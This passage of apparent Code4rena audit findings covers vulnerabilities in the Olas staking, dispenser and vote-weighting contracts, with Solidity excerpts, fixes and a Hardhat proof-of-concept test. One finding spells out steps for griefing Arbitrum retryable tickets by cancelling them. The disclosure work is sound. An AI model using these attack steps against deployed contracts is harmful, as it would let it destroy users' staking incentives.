    if (tokenomicsParametersUpdated & 0x01 == 0x01)

Impact

Owner changes would not be applied if the year changes in the middle of the epoch during the checkpoint.

Recommendation

Make the update flags independent of each other so that one update cannot overwrite another; for example, a mapping of pending updates could be used, as sketched below.
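
A minimal sketch of that idea, with hypothetical parameter keys and the actual parameter application omitted; it only illustrates how independent pending-update flags prevent one update from clobbering another.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Hypothetical, heavily simplified sketch; access control and the real parameter
// values are omitted
contract PendingUpdatesSketch {
    // Hypothetical keys; the real contract would enumerate its own parameter groups
    uint8 public constant EPOCH_LEN_UPDATE = 1;
    uint8 public constant INCENTIVE_FRACTIONS_UPDATE = 2;
    uint8 public constant YEAR_CHANGE_ADJUSTMENT = 3;

    mapping(uint8 => bool) public pendingUpdate;

    function scheduleUpdate(uint8 key) external {
        pendingUpdate[key] = true;
    }

    // Each pending update is consumed independently inside checkpoint(), so the
    // year-change adjustment cannot wipe out an owner-scheduled parameter change
    function checkpoint() external {
        if (pendingUpdate[EPOCH_LEN_UPDATE]) {
            pendingUpdate[EPOCH_LEN_UPDATE] = false;
            // apply the new epoch length / veOLAS threshold here (omitted)
        }
        if (pendingUpdate[INCENTIVE_FRACTIONS_UPDATE]) {
            pendingUpdate[INCENTIVE_FRACTIONS_UPDATE] = false;
            // apply the new incentive fractions here (omitted)
        }
        if (pendingUpdate[YEAR_CHANGE_ADJUSTMENT]) {
            pendingUpdate[YEAR_CHANGE_ADJUSTMENT] = false;
            // apply the inflation adjustment here (omitted)
        }
    }
}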

Assessed type

Context

QA Report

See the markdown file with the details of this report here.

QA Report

See the markdown file with the details of this report here.

Attacker can cancel claimed staking incentives on Arbitrum

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/ArbitrumDepositProcessorL1.sol#L190-L191

Vulnerability details

The ArbitrumDepositProcessorL1 contract is responsible for bridging OLAS tokens and messages from L1 to the ArbitrumTargetDispenserL2 contract on Arbitrum. When calling claimStakingIncentives() or claimStakingIncentivesBatch() on the Dispenser contract for a nominee on Arbitrum, it creates a retryable ticket via the Inbox.createRetryableTicket() function to send a message to Arbitrum to process the claimed incentives.

However, when creating this retryable ticket, the refundAccount is passed as both the excessFeeRefundAddress and callValueRefundAddress parameters. As per the Arbitrum documentation and code, specifying the callValueRefundAddress gives that address a critical permission to cancel the retryable ticket on L2.

This means an attacker can perform the following steps:

  1. Call claimStakingIncentives() on the Dispenser contract for a nominee on Arbitrum
  2. Provide an insufficient gas limit in the bridgePayload to ensure the ticket fails and is not auto-redeemed
  3. As soon as the ticket becomes available to redeem on Arbitrum, call the ArbRetryableTx's cancel() precompile method
  4. This will cancel the message and render all the claimed incentives irredeemable

While the protocol could call processDataMaintenance() on L2 with the data from the cancelled message to recover, this would require passing a governance proposal. Given that this attack can be carried out any number of times (e.g. as often as possible and with a different target each time), it can considerably impact the functioning of the protocol; hence I believe Medium severity is justified.

Impact

Attacker can grief the protocol by making legitimately claimed staking incentives irredeemable on L2. This would require governance intervention each time to recover the lost incentives.

Proof of Concept

  1. Attacker calls claimStakingIncentives() on the Dispenser contract for all nominees on Arbitrum, providing an insufficient gas limit and passing an EOA under their control as refundAccount in the bridgePayload
  2. Retryable ticket is created but fails to auto-redeem due to out of gas
  3. Once ticket is available to redeem on L2, attacker calls ArbRetryableTx.cancel() precompile method
  4. Message is cancelled and staking incentives are not redeemable on L2

Tools Used

Manual review

Recommended Mitigation Steps

Since no call value is ever sent with the ticket, the callValueRefundAddress can be left empty when creating the retryable ticket or an admin address passed instead, if the protocol wants to reserve the right to cancel tickets.
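
A minimal sketch of the change, reusing the createRetryableTicket parameter order quoted earlier in this report; the IBridge interface below is a simplified local stand-in, and owner is a hypothetical protocol-controlled address (for example, the timelock) that retains the cancellation right instead of the user-supplied refundAccount.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Simplified local stand-in mirroring the parameter order used in ArbitrumDepositProcessorL1
interface IBridgeSketch {
    function createRetryableTicket(address to, uint256 l2CallValue, uint256 maxSubmissionCost,
        address excessFeeRefundAddress, address callValueRefundAddress, uint256 gasLimit,
        uint256 maxFeePerGas, bytes calldata data) external payable returns (uint256);
}

contract ArbitrumTicketSketch {
    address public immutable l1MessageRelayer;
    address public immutable l2TargetDispenser;
    address public immutable owner; // protocol-controlled, not the user-supplied refundAccount

    constructor(address _relayer, address _dispenser, address _owner) {
        l1MessageRelayer = _relayer;
        l2TargetDispenser = _dispenser;
        owner = _owner;
    }

    // Called from a payable entry point in practice
    function _createTicket(uint256 cost, uint256 maxSubmissionCostMessage, address refundAccount,
        uint256 gasLimitMessage, uint256 gasPriceBid, bytes memory data) internal returns (uint256 sequence) {
        // Excess fees can still go back to the user, but the cancellation right
        // (callValueRefundAddress) stays with the protocol
        sequence = IBridgeSketch(l1MessageRelayer).createRetryableTicket{value: cost}(
            l2TargetDispenser, 0, maxSubmissionCostMessage, refundAccount, owner,
            gasLimitMessage, gasPriceBid, data);
    }
}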

Assessed type

Access Control

Staking contract emissions limit can be bypassed by multiple deposits

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L160-L186
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L356
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L266
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingVerifier.sol#L247
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingVerifier.sol#L256

Vulnerability details

The DefaultTargetDispenserL2 abstract contract is the base class for all contracts responsible for distributing OLAS tokens to staking contracts on L2. When processing a batch of deposits, it calls verifyInstanceAndGetEmissionsAmount() on the StakingFactory to check if each staking contract is valid and to get the maximum emissions amount allowed for that contract.

The verifyInstanceAndGetEmissionsAmount() function returns the lower of:

  1. The emissionsAmount() returned by the staking contract instance, which is calculated on initialization based on the _stakingParams
  2. The amount returned by StakingVerifier.getEmissionsAmountLimit(instance), which returns a fixed limit defined when the staking limits are changed

The issue is that both of these amounts only depend on the current configuration, and do not take into account any tokens already deposited into the staking contract. This means that the intended emissions limit can be trivially bypassed by simply spreading deposits across multiple batches.

Impact

Some staking contracts could receive a larger share of OLAS emissions than others, depending on when they claim their staking incentives. This could lead to an uneven distribution of rewards among stakers.

While total emissions are still bounded by other protocol limits, the ability to bypass the per-instance limit could undermine the intended incentive structure. Stakers who are aware of this issue could gain an advantage over those who are not.

Proof of Concept

  1. Assume the StakingVerifier emissions limit is set to 1000 tokens for a certain staking contract
  2. User calls Dispenser.claimStakingIncentives() with that staking contract as the target when the incentives reach 1000 tokens
  3. verifyInstanceAndGetEmissionsAmount() passes and the 1000 tokens are deposited
  4. User calls Dispenser.claimStakingIncentives() again with the same target and another 1000 tokens
  5. verifyInstanceAndGetEmissionsAmount() passes again since it only looks at the current config, allowing the second 1000 token deposit
  6. The staking contract has now received 2000 tokens, bypassing the 1000 token limit

Tools Used

Manual review

Recommended Mitigation Steps

The emissions limit check should take into account tokens already deposited into the staking contract.

One way to do this would be to add a depositedAmount state variable to the staking contracts that gets incremented in the deposit() function. The verifyInstanceAndGetEmissionsAmount() function could then check depositedAmount in addition to the config-based limits.

Alternatively, DefaultTargetDispenserL2 could track deposited amounts itself in a mapping and consult that as part of the emissions limit check.

The exact mitigation depends on the intended scope of the limit - whether it's meant to be a lifetime limit or a per-period limit. But in either case, already deposited amounts need to be factored in.
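
As an illustration of the first option, a minimal sketch is shown below; depositedAmount, emissionsLimit and the other names are hypothetical, and the real check would live in verifyInstanceAndGetEmissionsAmount() / the StakingVerifier rather than in the staking contract alone.

    pragma solidity ^0.8.0;

    // Sketch only: lifetime deposit tracking so the per-instance emissions limit holds
    // across any number of deposit batches. All names are illustrative.
    contract EmissionsLimitSketch {
        uint256 public immutable emissionsLimit; // the per-instance limit (config-based today)
        uint256 public depositedAmount;          // cumulative amount already deposited
        uint256 public availableRewards;

        constructor(uint256 _emissionsLimit) {
            emissionsLimit = _emissionsLimit;
        }

        // Counterpart of verifyInstanceAndGetEmissionsAmount(): the remaining capacity,
        // not the full configured limit, bounds what the dispenser may deposit next.
        function remainingEmissionsAmount() public view returns (uint256) {
            return emissionsLimit > depositedAmount ? emissionsLimit - depositedAmount : 0;
        }

        function deposit(uint256 amount) external {
            // Reject deposits that would exceed the lifetime limit
            require(amount <= remainingEmissionsAmount(), "emissions limit exceeded");
            depositedAmount += amount;
            availableRewards += amount;
            // the token transfer of `amount` would follow here
        }
    }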

Assessed type

Other

Removed nominee doesn't receive staking incentives for the epoch in which they were removed which is against the intended behaviour

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Dispenser.sol#L393
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Dispenser.sol#L849
https://github.com/code-423n4/2024-05-olas/blame/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Dispenser.sol#L774

Vulnerability details

Impact

If a nominee is removed in the i-th epoch, they should still be eligible to receive staking incentives for that epoch provided they had enough staking weight. Due to the current implementation, however, a removed nominee never receives staking incentives for the epoch in which they were removed, causing a loss of staking incentives for the nominee. It is evident from the code that the nominee is intended to be eligible for the epoch of removal, and the sponsors have also confirmed that the nominee should receive incentives for that epoch.

Proof of Concept

The following is the calculateStakingIncentives() function:

function calculateStakingIncentives(
        uint256 numClaimedEpochs,
        uint256 chainId,
        bytes32 stakingTarget,
        uint256 bridgingDecimals
    ) public returns (
        uint256 totalStakingIncentive,
        uint256 totalReturnAmount,
        uint256 lastClaimedEpoch,
        bytes32 nomineeHash
    ) {
        // Check for the correct chain Id
        if (chainId == 0) {
            revert ZeroValue();
        }

        // Check for the zero address
        if (stakingTarget == 0) {
            revert ZeroAddress();
        }

        // Get the staking target nominee hash
        nomineeHash = keccak256(abi.encode(IVoteWeighting.Nominee(stakingTarget, chainId)));

        uint256 firstClaimedEpoch;
        (firstClaimedEpoch, lastClaimedEpoch) =
            _checkpointNomineeAndGetClaimedEpochCounters(nomineeHash, numClaimedEpochs);

        // Checkpoint staking target nominee in the Vote Weighting contract
        IVoteWeighting(voteWeighting).checkpointNominee(stakingTarget, chainId);

        // Traverse all the claimed epochs
        for (uint256 j = firstClaimedEpoch; j < lastClaimedEpoch; ++j) {
            // Get service staking info
            ITokenomics.StakingPoint memory stakingPoint =
                ITokenomics(tokenomics).mapEpochStakingPoints(j);

            uint256 endTime = ITokenomics(tokenomics).getEpochEndTime(j);

            // Get the staking weight for each epoch and the total weight
            // Epoch endTime is used to get the weights info, since otherwise there is a risk of having votes
            // accounted for from the next epoch
            // totalWeightSum is the overall veOLAS power (bias) across all the voting nominees
            (uint256 stakingWeight, uint256 totalWeightSum) =
                IVoteWeighting(voteWeighting).nomineeRelativeWeight(stakingTarget, chainId, endTime);

            uint256 stakingIncentive;
            uint256 returnAmount;

            // Adjust the inflation by the maximum amount of veOLAS voted for service staking contracts
            // If veOLAS power is lower, it reflects the maximum amount of OLAS allocated for staking
            // such that all the inflation is not distributed for a minimal veOLAS power
            uint256 availableStakingAmount = stakingPoint.stakingIncentive;

            uint256 stakingDiff;
            if (availableStakingAmount > totalWeightSum) {
                stakingDiff = availableStakingAmount - totalWeightSum;
                availableStakingAmount = totalWeightSum;
            }

            // Compare the staking weight
            // 100% = 1e18, in order to compare with minStakingWeight we need to bring it from the range of 0 .. 10_000
            if (stakingWeight < uint256(stakingPoint.minStakingWeight) * 1e14) {
                // If vote weighting staking weight is lower than the defined threshold - return the staking incentive
                returnAmount = ((stakingDiff + availableStakingAmount) * stakingWeight) / 1e18;
            } else {
                // Otherwise, allocate staking incentive to corresponding contracts
                stakingIncentive = (availableStakingAmount * stakingWeight) / 1e18;
                // Calculate initial return amount, if stakingDiff > 0
                returnAmount = (stakingDiff * stakingWeight) / 1e18;

                // availableStakingAmount is not used anymore and can serve as a local maxStakingAmount
                availableStakingAmount = stakingPoint.maxStakingAmount;
                if (stakingIncentive > availableStakingAmount) {
                    // Adjust the return amount
                    returnAmount += stakingIncentive - availableStakingAmount;
                    // Adjust the staking incentive
                    stakingIncentive = availableStakingAmount;
                }

                // Normalize staking incentive if there is a bridge decimals limiting condition
                // Note: only OLAS decimals must be considered
                if (bridgingDecimals < 18) {
                    uint256 normalizedStakingAmount = stakingIncentive / (10 ** (18 - bridgingDecimals));
                    normalizedStakingAmount *= 10 ** (18 - bridgingDecimals);
                    // Update return amounts
                    // stakingIncentive is always bigger or equal than normalizedStakingAmount
                    returnAmount += stakingIncentive - normalizedStakingAmount;
                    // Downsize staking incentive to a specified number of bridging decimals
                    stakingIncentive = normalizedStakingAmount;
                }
                // Adjust total staking incentive amount
                totalStakingIncentive += stakingIncentive;
            }
            // Adjust total return amount
            totalReturnAmount += returnAmount;
        }
    }

From the above for loop it is visible that the staking incentives are calculated up to lastClaimedEpoch - 1.

for (uint256 j = firstClaimedEpoch; j < lastClaimedEpoch; ++j) {

The following function is used to determine the epochs for which a nominee is eligible to receive staking incentives:

 (firstClaimedEpoch, lastClaimedEpoch) =
            _checkpointNomineeAndGetClaimedEpochCounters(nomineeHash, numClaimedEpochs);
function _checkpointNomineeAndGetClaimedEpochCounters(
        bytes32 nomineeHash,
        uint256 numClaimedEpochs
    ) internal view returns (uint256 firstClaimedEpoch, uint256 lastClaimedEpoch) {
        // Get the current epoch number
        uint256 eCounter = ITokenomics(tokenomics).epochCounter();

        // Get the first claimed epoch, which is equal to the last claiming one
        firstClaimedEpoch = mapLastClaimedStakingEpochs[nomineeHash];

        // This must never happen as the nominee gets enabled when added to Vote Weighting
        // This is only possible if the dispenser has been unset in Vote Weighting for some time
        // In that case the check is correct and those nominees must not be considered
        if (firstClaimedEpoch == 0) {
            revert ZeroValue();
        }

        // Must not claim in the ongoing epoch
        if (firstClaimedEpoch == eCounter) {
            // Epoch counter is never equal to zero
            revert Overflow(firstClaimedEpoch, eCounter - 1);
        }

        // We still need to claim for the epoch number following the one when the nominee was removed
        uint256 epochAfterRemoved = mapRemovedNomineeEpochs[nomineeHash] + 1;
        // If the nominee is not removed, its value in the map is always zero, unless removed
        // The staking contract nominee cannot be removed in the zero-th epoch by default
        if (epochAfterRemoved > 1 && firstClaimedEpoch >= epochAfterRemoved) {
            revert Overflow(firstClaimedEpoch, epochAfterRemoved - 1);
        }

        // Get a number of epochs to claim for based on the maximum number of epochs claimed
        lastClaimedEpoch = firstClaimedEpoch + numClaimedEpochs;

        // Limit last claimed epoch by the number following the nominee removal epoch
        // The condition for is lastClaimedEpoch strictly > because the lastClaimedEpoch is not included in claiming
        if (epochAfterRemoved > 1 && lastClaimedEpoch > epochAfterRemoved) {
            lastClaimedEpoch = epochAfterRemoved;
        }

        // Also limit by the current counter, if the nominee was removed in the current epoch
        if (lastClaimedEpoch > eCounter) {
            lastClaimedEpoch = eCounter;
        }
    }

From the following if condition it is clear that the nominee is also eligible to receive staking incentives for the epoch in which it was removed:

 if (epochAfterRemoved > 1 && lastClaimedEpoch > epochAfterRemoved) {
            lastClaimedEpoch = epochAfterRemoved;
        }

Since the for loop runs up to lastClaimedEpoch - 1, it is evident that a removed nominee is also eligible for the staking incentives of the epoch in which it was removed.

Now let's see what happens when a nominee is removed. First, it is removed in VoteWeighting.sol via the removeNominee() function, which is as follows:

function removeNominee(bytes32 account, uint256 chainId) external {
        // Check for the contract ownership
        if (msg.sender != owner) {
            revert OwnerOnly(owner, msg.sender);
        }

        // Get the nominee struct and hash
        Nominee memory nominee = Nominee(account, chainId);
        bytes32 nomineeHash = keccak256(abi.encode(nominee));

        // Get the nominee id in the nominee set
        uint256 id = mapNomineeIds[nomineeHash];
        if (id == 0) {
            revert NomineeDoesNotExist(account, chainId);
        }

        // Set nominee weight to zero
        uint256 oldWeight = _getWeight(account, chainId);
        uint256 oldSum = _getSum();
        uint256 nextTime = (block.timestamp + WEEK) / WEEK * WEEK;
        pointsWeight[nomineeHash][nextTime].bias = 0;
        timeWeight[nomineeHash] = nextTime;

        // Account for the the sum weight change
        uint256 newSum = oldSum - oldWeight;
        pointsSum[nextTime].bias = newSum;
        timeSum = nextTime;

        // Add to the removed nominee map and set
        mapRemovedNominees[nomineeHash] = setRemovedNominees.length;
        setRemovedNominees.push(nominee);

        // Remove nominee from the map
        mapNomineeIds[nomineeHash] = 0;

        // Shuffle the current last nominee id in the set to be placed to the removed one
        nominee = setNominees[setNominees.length - 1];
        bytes32 replacedNomineeHash = keccak256(abi.encode(nominee));
        mapNomineeIds[replacedNomineeHash] = id;
        setNominees[id] = nominee;
        // Pop the last element from the set
        setNominees.pop();

        // Remove nominee in dispenser, if applicable
        address localDispenser = dispenser;
        if (localDispenser != address(0)) {
            IDispenser(localDispenser).removeNominee(nomineeHash);
        }

        emit RemoveNominee(account, chainId, newSum);
    }

The key thing to note is that if a nominee is removed in week i, its weight/bias is zeroed starting from the next week boundary, i.e. from week i+1 onwards it has no weight:

uint256 nextTime = (block.timestamp + WEEK) / WEEK * WEEK;
        pointsWeight[nomineeHash][nextTime].bias = 0;

removeNominee() on the Dispenser is also called, which is as follows:

function removeNominee(bytes32 nomineeHash) external {
        // Check for the contract ownership
        if (msg.sender != voteWeighting) {
            revert ManagerOnly(msg.sender, voteWeighting);
        }

        // Check for the retainer hash
        if (retainerHash == nomineeHash) {
            revert WrongAccount(retainer);
        }

        // Get the epoch counter
        uint256 eCounter = ITokenomics(tokenomics).epochCounter();

        // Get the previous epoch end time
        // Epoch counter is never equal to zero
        uint256 endTime = ITokenomics(tokenomics).getEpochEndTime(eCounter - 1);

        // Get the epoch length
        uint256 epochLen = ITokenomics(tokenomics).epochLen();

        // Check that there is more than one week before the end of the ongoing epoch
        // Note that epochLen cannot be smaller than one week as per specified limits
        uint256 maxAllowedTime = endTime + epochLen - 1 weeks;
        if (block.timestamp >= maxAllowedTime) {
            revert Overflow(block.timestamp, maxAllowedTime);
        }

        // Set the removed nominee epoch number
        mapRemovedNomineeEpochs[nomineeHash] = eCounter;
    }

The key thing to note here is the following condition:

uint256 maxAllowedTime = endTime + epochLen - 1 weeks;
        if (block.timestamp >= maxAllowedTime) {
            revert Overflow(block.timestamp, maxAllowedTime);
        }

From the above condition it is clear that a nominee can only be removed if more than one week is left before the epoch ends. In simpler terms, if the epoch is scheduled to end in week i, the nominee can only be removed in the weeks before week i (not including week i).

As we have seen above, if a nominee is removed in week i, its weight from week i+1 onwards will be zero.

So when the staking incentives are calculated for the removed nominee for the epoch in which they were removed, the result is always zero, because the nominee's weight at that epoch's end time is zero.

 ITokenomics.StakingPoint memory stakingPoint =
                ITokenomics(tokenomics).mapEpochStakingPoints(j);

            uint256 endTime = ITokenomics(tokenomics).getEpochEndTime(j);

            // Get the staking weight for each epoch and the total weight
            // Epoch endTime is used to get the weights info, since otherwise there is a risk of having votes
            // accounted for from the next epoch
            // totalWeightSum is the overall veOLAS power (bias) across all the voting nominees
     (uint256 stakingWeight, uint256 totalWeightSum) =
         IVoteWeighting(voteWeighting).nomineeRelativeWeight(stakingTarget, chainId, endTime);

Note: here the stakingWeight returned for the epoch in which the nominee was removed will be zero.

In the current codebase it is intended that the removed nominee is eligible for the epoch in which they were removed, but they do not actually receive those incentives, so this is a bug.

Tools Used

Manual review

Recommended Mitigation Steps

The easiest way would be to not make removed nominees eligible for staking incentives for the epoch in which they were removed. Alternatively, allow removing a nominee only when there is less than a week left before the epoch ends. For that, change the following if condition https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Dispenser.sol#L774 to:

    if (block.timestamp < maxAllowedTime) {
        revert(); // revert with a suitable custom error
    }

Note that even with this approach, staking incentives can still be lost if the epoch does not end for a few more weeks.

Assessed type

Context

Slope may be miscalculated

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L534

Vulnerability details

Impact

In the voteForNomineeWeights() function, the influence of oldSlope on the slope is taken into account.
However, because the state changes in pointsWeight/pointsSum can get out of sync with those in changesWeight/changesSum, slope calculation errors may occur.

Proof of Concept

github:https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L534

        if (oldSlope.end > nextTime) {
            pointsWeight[nomineeHash][nextTime].slope =
                _maxAndSub(pointsWeight[nomineeHash][nextTime].slope + newSlope.slope, oldSlope.slope);
            pointsSum[nextTime].slope = _maxAndSub(pointsSum[nextTime].slope + newSlope.slope, oldSlope.slope);
        } else {
            pointsWeight[nomineeHash][nextTime].slope += newSlope.slope;
            pointsSum[nextTime].slope += newSlope.slope;
        }
        if (oldSlope.end > block.timestamp) {
            // Cancel old slope changes if they still didn't happen
            changesWeight[nomineeHash][oldSlope.end] -= oldSlope.slope;
            changesSum[oldSlope.end] -= oldSlope.slope;
        }

When oldSlope.end <= nextTime, the code does not subtract oldSlope.slope, on the assumption that it has already been or will be subtracted in _getWeight() and _getSum().

github:https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L233C1-L236C36

            if (pt.bias > dBias) {
                pt.bias -= dBias;
                uint256 dSlope = changesSum[t];
                pt.slope -= dSlope;

github:https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L275

            if (pt.bias > dBias) {
                pt.bias -= dBias;
                uint256 dSlope = changesWeight[nomineeHash][t];
                pt.slope -= dSlope;
            } 

But consider this situation:

When block.timestamp < oldSlope.end <= nextTime, changesWeight and changesSum have oldSlope.slope subtracted, but pointsWeight and pointsSum do not, which means pointsWeight and pointsSum will never have oldSlope.slope subtracted. This leads to an incorrect slope calculation.

POC:

  1. Assume oldSlope.slope is 100,
    oldSlope.end is 2 weeks,
    block.timestamp is 1.5 weeks,
    nextTime is (block.timestamp + 1 week) / 1 week * 1 week = 2 weeks,
    changesWeight[oldSlope.end] and changesSum[oldSlope.end] are 100.

  2. voteForNomineeWeights() is called.
    Because oldSlope.end > block.timestamp (2 weeks > 1.5 weeks), changesWeight[oldSlope.end] and changesSum[oldSlope.end] become 0 (oldSlope.slope is subtracted).
    Because oldSlope.end == nextTime, pointsWeight and pointsSum do not have oldSlope.slope subtracted.

  3. When block.timestamp >= 2 weeks and _getWeight() / _getSum() are called, changesWeight[oldSlope.end] and changesSum[oldSlope.end] are already 0, so pointsWeight and pointsSum will not have oldSlope.slope subtracted.
    Thus oldSlope.slope is never subtracted.

Tools Used

Manual audit

Recommended Mitigation Steps

When oldSlope.end == nextTime, oldSlope.slope also needs to be subtracted:

-        if (oldSlope.end > nextTime) {
+        if (oldSlope.end >= nextTime) {
            pointsWeight[nomineeHash][nextTime].slope =
                _maxAndSub(pointsWeight[nomineeHash][nextTime].slope + newSlope.slope, oldSlope.slope);
            pointsSum[nextTime].slope = _maxAndSub(pointsSum[nextTime].slope + newSlope.slope, oldSlope.slope);
        } else {
            pointsWeight[nomineeHash][nextTime].slope += newSlope.slope;
            pointsSum[nextTime].slope += newSlope.slope;
        }
        if (oldSlope.end > block.timestamp) {
            // Cancel old slope changes if they still didn't happen
            changesWeight[nomineeHash][oldSlope.end] -= oldSlope.slope;
            changesSum[oldSlope.end] -= oldSlope.slope;
        }

Assessed type

Other

A staked service may not be rewarded as available rewards may show obsolete value

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L721

Vulnerability details

Impact

The availableRewards value is not guaranteed to be up to date. When staking a service, it should therefore be updated beforehand; otherwise a staked service may not earn any reward despite its multisig executing transactions.

Proof of Concept

  • Suppose available rewards is 0.01 ETH.

  • Then, Service1 is staked, and its multisig executes transactions.

  • One liveness period elapses.

  • If checkpoint() were called now, service1 would be rewarded 0.01 ETH (equal to the available rewards) for its multisig transaction execution. But suppose this function has not been called yet, so the available rewards still equal 0.01 ETH.

  • Then, service2 is staked. It is staked successfully because the available rewards are still nonzero.

    function stake(uint256 serviceId) external {
       // Check if there available rewards
       if (availableRewards == 0) {
           revert NoRewardsAvailable();
       }
       //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L721

  • Then, before the service2 multisig executes any transactions, the function checkpoint() is called by the service1 owner (or anyone). By doing so, the rewards allocated to service1 are calculated (0.01 ETH), and the available rewards are updated to zero.
    https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L661
    https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L661

  • Then, service2 multisig executes transactions. It is expected that because of multisig transaction execution, rewards will be allocated to service2. But, since the checkpoint() is called just before and all the available rewards are allocated to service1, nothing is left for service2.

  • Now, service1 has a 0.01 ETH reward that can be claimed at any time. As for service2, although its multisig has executed transactions, there is no reward left to allocate to it.

The root cause of this issue is that when a service is staked, only the current value of availableRewards is checked. If it is nonzero, the contract assumes there are rewards available to allocate to this service once its multisig executes transactions, and allows the stake. However, it is not guaranteed that availableRewards is correct and up to date: it can include rewards already earned by other services that have not been claimed yet (or for which checkpoint() has not been called yet), so its value may be obsolete.

In other words, when staking a service, the value of availableRewards should first be updated by calling checkpoint(). But since checkpoint() calls the internal function _calculateStakingRewards(), which only updates if livenessPeriod has elapsed since the last checkpoint, a better solution is needed, as explained in the Recommendation section.

    function _calculateStakingRewards() internal view returns (
       uint256 lastAvailableRewards,
       uint256 numServices,
       uint256 totalRewards,
       uint256[] memory eligibleServiceIds,
       uint256[] memory eligibleServiceRewards,
       uint256[] memory serviceIds,
       uint256[][] memory serviceNonces,
       uint256[] memory serviceInactivity
   )
   {
       //.....
       if (block.timestamp - tsCheckpointLast >= livenessPeriod && lastAvailableRewards > 0) {
       //.....
       }
   }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L536

Test Case

In the following test, the available rewards are 0.01 ETH. Service1 is staked and its multisig executes a transaction. Then, after a liveness period, service2 is staked (the available rewards still equal 0.01 ETH). Before the service2 multisig executes a transaction, checkpointAndClaim is called for service1, so 0.01 ETH is rewarded to service1 and the available rewards drop to zero. Then the service2 multisig executes a transaction and attempts to claim its rewards, but the call reverts because no rewards are left.

        it("Service2 does not earn any reward", async function () {
            // Take a snapshot of the current state of the blockchain
            const snapshot = await helpers.takeSnapshot();

            // Deposit to the contract
            await deployer.sendTransaction({ to: stakingNativeToken.address, value: ethers.utils.parseEther("0.01") });

            ////////////////////////////////////// Service 1
            // Approve services
            await serviceRegistry.approve(stakingNativeToken.address, serviceId);

            // Stake the service
            await stakingNativeToken.stake(serviceId);

            // Get the service multisig contract
            const service = await serviceRegistry.getService(serviceId);
            const multisig = await ethers.getContractAt("GnosisSafe", service.multisig);

            // Make transactions by the service multisig
            let nonce = await multisig.nonce();
            let txHashData = await safeContracts.buildContractCall(multisig, "getThreshold", [], nonce, 0, 0);
            let signMessageData = await safeContracts.safeSignMessage(agentInstances[0], multisig, txHashData, 0);
            await safeContracts.executeTx(multisig, txHashData, [signMessageData], 0);
            ///////////////////////////////////


            // Increase the time for the liveness period
            await helpers.time.increase(livenessPeriod);


            ////////////////////////////////////// Service 2
            await serviceRegistry.approve(stakingNativeToken.address, serviceId + 1);
            await stakingNativeToken.stake(serviceId + 1);

            // the transactions are not made yet by the service2 multisig
            ///////////////////////////////////

            let reward = await stakingNativeToken.calculateStakingReward(serviceId);
            let reward2 = await stakingNativeToken.calculateStakingReward(serviceId + 1);

            console.log("service1 rewards: ", reward);
            console.log("service2 rewards: ", reward2);
            console.log("available rewards: ", await stakingNativeToken.availableRewards());


            console.log("to-be-claimed rewards allocated to service1: ", await stakingNativeToken.callStatic.checkpointAndClaim(serviceId));

            // Call claim (calls checkpoint as well)
            await stakingNativeToken.checkpointAndClaim(serviceId);

            //////////////// Service 2: making transactions by service2 multisig
            // Get the service multisig contract
            const service2 = await serviceRegistry.getService(serviceId + 1);
            const multisig2 = await ethers.getContractAt("GnosisSafe", service2.multisig);

            // Make transactions by the service multisig
            let nonce2 = await multisig2.nonce();
            let txHashData2 = await safeContracts.buildContractCall(multisig2, "getThreshold", [], nonce2, 0, 0);
            let signMessageData2 = await safeContracts.safeSignMessage(agentInstances[1], multisig2, txHashData2, 0);
            await safeContracts.executeTx(multisig2, txHashData2, [signMessageData2], 0);
            //////////////////////

            console.log("available rewards: ", await stakingNativeToken.availableRewards());

            // to-be-claimed rewards allocated to service2 is zero because available rewards is zero
            await expect(stakingNativeToken.checkpointAndClaim(serviceId + 1)).to.be.reverted;


            // Restore a previous state of blockchain
            snapshot.restore();
        });

The result is:

  Staking
    Staking and unstaking
service1 rewards:  BigNumber { value: "10000000000000000" }
service2 rewards:  BigNumber { value: "0" }
available rewards:  BigNumber { value: "10000000000000000" }
to-be-claimed rewards allocated to service1:  BigNumber { value: "10000000000000000" }
available rewards:  BigNumber { value: "0" }
      ✔ Service2 does not earn any reward

Tools Used

Recommended Mitigation Steps

A view function similar to checkpoint should be implemented so that it does not change the storage variables. This function should call a function similar to _calculateStakingRewards that does not have the condition block.timestamp - tsCheckpointLast >= livenessPeriod.

    function checkpointRead() public view returns (uint256 availableRewardsTemp)   
    {
        //.....
